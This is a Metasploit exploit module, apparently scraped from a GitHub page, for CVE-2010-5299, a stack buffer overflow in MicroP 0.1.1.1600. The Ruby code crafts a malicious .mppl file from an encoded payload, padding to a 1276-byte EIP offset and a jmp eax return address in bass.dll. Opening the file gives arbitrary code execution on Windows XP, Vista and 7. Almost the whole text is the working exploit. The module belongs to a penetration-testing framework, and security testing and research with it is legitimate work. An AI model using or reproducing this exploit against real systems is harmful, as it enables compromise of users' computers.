Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in MicroP 0.1.1.1600. A stack-based
buffer overflow occurs when the content of a .mppl file gets copied onto the stack,
which overwrites the lpFileName parameter of a CreateFileA() function, and results
arbitrary code execution under the context of the user.
},
'License' => MSF_LICENSE,
'Author' => [ 'James Fitts <fitts.james[at]gmail.com>' ],
'References' =>
[
[ 'CVE', '2010-5299' ],
[ 'OSVDB', '73627'],
[ 'EDB', '14720' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => true
},
'Payload' =>
{
'Space' => 728,
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 / Vista / 7',
{
'Ret' => 0x100145b5, #jmp eax in bass.dll
'Offset' => 1276, #Offset to overwrite EIP
}
],
],
'Privileged' => false,
'DisclosureDate' => '2010-08-23',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.mppl']),
])
end
def exploit
mppl = payload.encoded
mppl << rand_text_alpha(target['Offset'] - payload.encoded.length)
mppl << [target.ret].pack('V')
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(mppl)
end
end